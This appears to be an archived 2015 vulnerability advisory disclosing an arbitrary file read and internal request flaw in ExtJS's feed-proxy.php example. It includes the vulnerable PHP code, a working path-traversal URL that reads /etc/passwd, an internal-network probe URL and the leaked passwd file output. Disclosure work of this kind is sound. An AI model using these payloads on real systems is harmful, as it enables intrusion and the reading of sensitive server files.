extjs Arbitrary File Read

extjs Arbitrary File Read: Posted May 26, 2015; Authored by Jianfeng Gao; extjs suffers from an arbitrary file read vulnerability.; tags | exploit, arbitrary, info disclosure; SHA-256 | 25c706347c312a1dbec64e7145f83ad3ced43c430111d99c2af5d66c8674f7a1; Download | Favorite | View

extjs Arbitrary File Read

Hi all£º

Baidu Security Team found a vulnerability in extjs,with this vulnerability we can read arbitrary file and request internal http services

File: /examples/feed-viewer/feed-proxy.php  line:3-line:6

$feed = $_REQUEST['feed'];


if($feed != '' && strpos($feed, 'http') === 0){


    header('Content-Type: text/xml');


    $xml = file_get_contents($feed);




When we request like this url
http://dev.sencha.com/extjs/5.0.0/examples/feed-viewer/feed-proxy.php?feed=http://10.1.1.1

if the resource exist,we can get internal http services info

¡°strpos($feed, 'http') === 0¡± we can request this url to bypass the restrictions achieve arbitrary file read

http://dev.sencha.com/extjs/5.0.0/examples/feed-viewer/feed-proxy.php?feed=http/../../../../../../../../../../../etc/passwd


view the HTML source code


root:x:0:0:Web-useast4 root:/root:/bin/bash


daemon:x:1:1:daemon:/usr/sbin:/bin/sh


bin:x:2:2:bin:/bin:/bin/sh


sys:x:3:3:sys:/dev:/bin/sh


sync:x:4:65534:sync:/bin:/bin/sync


games:x:5:60:games:/usr/games:/bin/sh


man:x:6:12:man:/var/cache/man:/bin/sh


lp:x:7:7:lp:/var/spool/lpd:/bin/sh


mail:x:8:8:mail:/var/mail:/bin/sh


news:x:9:9:news:/var/spool/news:/bin/sh


uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh


proxy:x:13:13:proxy:/bin:/bin/sh


www-data:x:33:33:Web-useast4 www-data:/var/www:/bin/sh


backup:x:34:34:backup:/var/backups:/bin/sh


list:x:38:38:Mailing List Manager:/var/list:/bin/sh


irc:x:39:39:ircd:/var/run/ircd:/bin/sh


gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh


nobody:x:65534:65534:nobody:/nonexistent:/bin/sh


libuuid:x:100:101::/var/lib/libuuid:/bin/sh


syslog:x:101:103::/home/syslog:/bin/false


messagebus:x:102:105::/var/run/dbus:/bin/false


landscape:x:103:108::/var/lib/landscape:/bin/false


sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin


ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash


ntp:x:105:111::/home/ntp:/bin/false


snmp:x:106:112::/var/lib/snmp:/bin/false


statd:x:107:65534::/var/lib/nfs:/bin/false


postfix:x:108:114::/var/spool/postfix:/bin/false





Submitter: zhanghao@Baidu X-team  gaojianfeng@Baidu X-team    shitong@Baidu X-team

________________________________
Id:Yaseng
Hi: Hisengberg
Team: Baidu X-team
E-mail:gaojianfeng@baidu.com<mailto:gedongyu@baidu.com>
[tips]

Top Authors In Last 30 Days

Red Hat 267 files
indoushka 178 files
Jay Turla 150 files
Ubuntu 74 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Gentoo 24 files
Karn Ganeshen 23 files

File Archives

Systems

AIX (430)
Apple (2,115)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,125)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,591)
HPUX (881)
iOS (390)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,312)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (16,885)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,861)
UNIX (9,458)
UnixWare (188)
Windows (6,772)
Other

extjs Arbitrary File Read

extjs Arbitrary File Read

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

extjs Arbitrary File Read

Share This

extjs Arbitrary File Read

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems